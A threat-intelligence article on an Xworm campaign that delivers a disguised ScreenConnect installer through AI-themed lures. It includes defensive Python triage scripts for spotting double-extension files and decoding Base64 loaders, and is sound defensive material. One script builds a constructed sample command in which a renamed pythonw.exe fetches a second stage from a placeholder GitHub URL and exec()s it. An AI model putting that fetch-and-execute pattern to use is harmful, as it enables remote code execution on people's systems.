Malicious ScreenConnect Campaign Abuses AI-Themed Lures for Xworm Delivery
Trustwave’s SpiderLabs Threat Hunt team recently uncovered a malicious campaign that used AI-themed lures to deliver the Xworm RAT. The attackers used fake AI-generated content to trick users into downloading a ScreenConnect installer, which kicked off a multi-stage infection chain. The campaign shows how cybercriminals ride the current interest in AI to get past traditional security defenses.
The attackers relied on social engineering (phishing, malvertising, and fake social media posts) to convince users to download the malicious installer. In one case the victim was lured to a fake AI website, gtpgrok.ai, which redirected to the malicious site anhemvn6.com.
Initial Access and Execution
The ScreenConnect installer was disguised as a media file named “Creation_Made_By_GrokAI.mp4 Grok.com”, a double-extension lure in which the visible “.mp4” is not the extension the operating system acts on. Analysis showed the file was actually ScreenConnect.ClientSetup.msi. The attackers tampered with the file’s Authenticode signature data so that the installer still presented as a signed ScreenConnect client while concealing its true purpose. Once run, the installer connected to a ScreenConnect server controlled by the attackers. The malicious client ran in the background with no visible indicator, giving the attackers remote access to the victim’s system.
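The naming trick above is the kind of thing a triage script should catch before a human ever opens the file: compare the extension the victim reads first, the extension the OS dispatches on, and the bytes actually present. The following check is an added example written for this article, not code from Trustwave or from the campaign. The lure filename is taken from the report; the file bytes are a constructed OLE Compound File header standing in for the real MSI, and the extension-to-type table and the MP4 “ftyp” test are standard magic-number facts, not findings from the investigation.

```python
import re

# Well-known leading bytes (magic numbers). An .msi is an OLE Compound File,
# which is why the real installer could never start like an MP4.
OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"


def identify(data: bytes) -> str:
    """Classify a file by its content, ignoring whatever the name claims."""
    if data.startswith(OLE_MAGIC):
        return "ole-compound"          # MSI installers, legacy Office docs
    if data.startswith(b"MZ"):
        return "pe"                    # .exe/.dll, or a PE renamed to .com/.scr
    if data.startswith(b"PK\x03\x04"):
        return "zip"
    if len(data) >= 12 and data[4:8] == b"ftyp":
        return "mp4"                   # ISO base media file: what a real .mp4 is
    return "unknown"


# What each displayed extension should look like on disk.
EXT_TO_TYPE = {
    "mp4": "mp4", "m4v": "mp4", "mov": "mp4",
    "msi": "ole-compound",
    "exe": "pe", "com": "pe", "scr": "pe",
    "zip": "zip",
}
MEDIA_EXTS = {"mp4", "m4v", "mov"}
# Every ".ext" token in the name; the lure name yields ["mp4", "com"].
EXT_RE = re.compile(r"\.([A-Za-z0-9]{2,4})(?=[\s.]|$)")


def extensions(filename: str) -> list:
    return [m.group(1).lower() for m in EXT_RE.finditer(filename)]


def check(filename: str, data: bytes) -> dict:
    """Compare the extension a user reads first, the extension the OS
    dispatches on, and the bytes actually present."""
    exts = extensions(filename)
    visible = exts[0] if exts else None      # what the victim reads
    effective = exts[-1] if exts else None   # what Windows acts on
    actual = identify(data)
    findings = []
    if len(exts) > 1:
        findings.append("multiple extensions in name")
        if " " in filename:
            findings.append("space inside the name separates the visible extension from the real one")
    if visible in EXT_TO_TYPE and EXT_TO_TYPE[visible] != actual:
        findings.append(f"name claims {visible}, content is {actual}")
    if visible in MEDIA_EXTS and actual in ("pe", "ole-compound"):
        findings.append("media filename on executable/installer content")
    return {
        "visible_ext": visible,
        "effective_ext": effective,
        "actual_type": actual,
        "findings": findings,
        "suspicious": bool(findings),
    }


# Constructed sample: the lure name from the report, paired with a stand-in
# OLE header (NOT the real installer) so the check runs offline.
SAMPLE_NAME = "Creation_Made_By_GrokAI.mp4 Grok.com"
SAMPLE_BYTES = OLE_MAGIC + b"\x00" * 504

if __name__ == "__main__":
    result = check(SAMPLE_NAME, SAMPLE_BYTES)
    for finding in result["findings"]:
        print("-", finding)
```

Keying on content rather than on name is the whole point: a genuine clip named clip.mp4 produces no findings, while the lure trips every test at once (two extensions, a space between them, a media name on OLE bytes). A signature check belongs alongside this, but a valid Authenticode signature is not by itself a clean bill of health, as this campaign shows.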
Malicious Payload and Execution Chain
During the remote session, the attackers executed a batch file called X-META Firebase_crypted.bat, which downloaded a zip archive named 5btc.zip from anhemvn4.com. The archive contained a renamed copy of pythonw.exe (pw.exe) that ran a Base64-encoded Python command. Once decoded, the command attempted to pull additional payloads from a GitHub repository.
Because the loader was fetched from GitHub and executed in memory rather than written to disk, file-based detection had little to inspect. The Python code then injected into legitimate processes such as chrome.exe and msedge.exe, hiding the attackers’ activity from the victim.
Persistence and Credential Access
For persistence, the attackers modified the system registry: an autorun entry was created so that pythonw.exe executed each time the user logged on, giving the attackers access again after a reboot. That pythonw.exe invocation also ran encoded Python commands, which once more reached out to the same GitHub repository.
The attackers also used WMI queries to enumerate the operating system and installed antivirus software. pw.exe went after sensitive browser data as well, attempting to read saved login credentials and session cookies from Google Chrome, Microsoft Edge, and Mozilla Firefox.
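Both the initial Base64-encoded launcher in the execution chain and the encoded commands behind the autorun entry follow the same pattern: an interpreter invoked with an inline script that decodes and exec()s a payload fetched from GitHub. The script below is an added example written for this article, not code from Trustwave or from the campaign. It peels such a command line layer by layer and extracts the URLs it reaches for. The sample Run value, the C:\Users\Public\pw.exe path, and the raw.githubusercontent.com path inside it are constructed for illustration; nothing here is an indicator recovered from the incident.

```python
import base64
import binascii
import re

# Constructed sample, not recovered from the incident: a Run-value style
# command line in which a renamed pythonw.exe runs a Base64-wrapped one-liner
# that fetches and exec()s a second stage from a hypothetical GitHub path.
_INNER = (
    "import urllib.request;"
    "exec(urllib.request.urlopen("
    "'https://raw.githubusercontent.com/example-org/example-repo/main/stage2.py'"
    ").read())"
)
_STAGE1 = "import base64;exec(base64.b64decode('%s'))" % (
    base64.b64encode(_INNER.encode()).decode()
)
SAMPLE_RUN_VALUE = r'"C:\Users\Public\pw.exe" -c "' + _STAGE1 + '"'

B64_RE = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


def decode_blobs(text: str) -> list:
    """Return every long Base64 run in text that decodes to valid UTF-8."""
    out = []
    for m in B64_RE.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
            out.append(raw.decode("utf-8"))
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
    return out


def peel(text: str, max_depth: int = 5) -> list:
    """Decode nested Base64 layers until nothing new appears."""
    layers, frontier = [], [text]
    for _ in range(max_depth):
        nxt = [d for t in frontier for d in decode_blobs(t)]
        if not nxt:
            break
        layers.extend(nxt)
        frontier = nxt
    return layers


def triage(cmdline: str) -> dict:
    """Score a command line the way a hunter reads it: keyed on the pattern
    (-c plus an encoded, self-executing payload), not on the binary name,
    because pythonw.exe was renamed to pw.exe in this campaign."""
    layers = peel(cmdline)
    text = "\n".join([cmdline] + layers)
    urls = sorted(set(URL_RE.findall(text)))
    indicators = []
    if re.search(r"\s-c\s", cmdline):
        indicators.append("inline -c script")
    if layers:
        indicators.append("base64-wrapped payload")
    if re.search(r"\bexec\(|b64decode\(|urlopen\(", text):
        indicators.append("decodes/executes fetched code")
    if any("github" in u.lower() for u in urls):
        indicators.append("fetches from GitHub")
    return {
        "layers": layers,
        "urls": urls,
        "indicators": indicators,
        "suspicious": len(indicators) >= 2,
    }


if __name__ == "__main__":
    result = triage(SAMPLE_RUN_VALUE)
    for layer in result["layers"]:
        print("decoded:", layer)
    print("urls:", result["urls"])
    print("indicators:", result["indicators"])
```

Feed it the Run-key values and process command lines from an endpoint timeline and the encoded stage collapses into a readable one-liner and a list of URLs to block or pivot on. Scoring on the command shape rather than the image name matters here because renaming the interpreter defeats any rule that only looks for pythonw.exe.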
Ongoing Campaign and Response
In this campaign the EDR produced no alerts for the malicious activity. The threats were identified only through manual review of the timeline within Defender, underscoring the value of human-driven threat hunting alongside automated tooling.
The AI-themed content made the campaign more believable. That social engineering raises the odds of a successful infection, especially when paired with a modified copy of a legitimate tool such as ScreenConnect, whose presence on a host rarely looks out of place.
Conclusion
This investigation highlights the growing sophistication of cybercriminal campaigns. The attackers combined AI-themed deception with an abused remote-access tool and fileless execution to slip past automated defenses and carry out a targeted, effective attack. The findings reinforce the importance of human expertise in threat hunting: automated tools play a crucial role, but they do not replace skilled analysts who can recognise evolving threats in the data those tools collect.
To stay ahead of the curve, organizations must invest in threat hunting and manual analysis to detect sophisticated attacks that bypass automated systems.